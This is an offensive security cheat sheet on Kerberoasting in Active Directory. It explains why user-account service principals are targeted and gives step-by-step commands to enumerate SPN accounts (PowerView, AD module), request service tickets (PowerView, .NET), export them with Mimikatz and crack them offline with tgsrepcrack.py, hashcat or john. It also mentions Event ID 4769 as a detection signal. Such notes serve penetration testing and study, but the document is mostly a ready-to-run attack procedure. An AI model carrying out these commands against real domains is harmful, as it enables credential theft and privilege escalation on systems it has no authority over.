KERBEROASTING

A Kerberoasting attack is mainly used for vertical and horizontal privilege escalation. Any authenticated domain user can request a service ticket (TGS) for any registered SPN; the ticket is encrypted with the service account's password hash, so it can be taken offline and cracked without ever touching the service itself.

Kerberoasting services that run under a machine (computer) account is a waste of time: machine account passwords are long, random and rotated automatically by the OS (120 characters, every 30 days by default), so a wordlist attack against such a ticket will not recover the password.

Kerberoasting is therefore aimed at services whose SPN is registered on a user account (a "service account"), because those passwords are chosen by humans and are often weak and never rotated. Tickets encrypted with RC4-HMAC (etype 23) are the cheapest to crack; AES-encrypted tickets cost far more per guess. Caveat: every TGS request is logged on the DC as Event ID 4769, and a burst of RC4 (0x17) ticket requests for user-account SPNs from one host is a well-known detection for this attack.

Enumerating user accounts that have an SPN in the current domain (ignore krbtgt, which always shows up with kadmin/changepw)

PowerView
Get-NetUser -SPN
Active Directory Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Cracking the ticket yields the service account's cleartext password, so you gain exactly that account's privileges (whatever it has been granted: often local admin on the hosts the service runs on, sometimes far more).

Requesting a TGS for the service from any domain user account (no special privilege is needed)

PowerView
Request-SPNTicket -SPN <SPN FQDN>
.NET only (no AD module or PowerView required)
Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN FQDN>"

Verifying that the ticket is now in the cache using klist

Exporting the cached tickets (written as .kirbi files into the current directory) so the encrypted part can be cracked offline

Invoke-Mimikatz -Command '"kerberos::list /export"'

Cracking the exported TGS ticket with a wordlist (tgsrepcrack.py from the Kerberoast toolkit; it only succeeds if the service password is actually in the wordlist)

python .\tgsrepcrack.py <WORDLIST> <TOKEN FILE>

Alternatively, convert the .kirbi with kirbi2john.py from the same toolkit and crack with hashcat -m 13100 or john --format=krb5tgs, which are much faster and support rules.
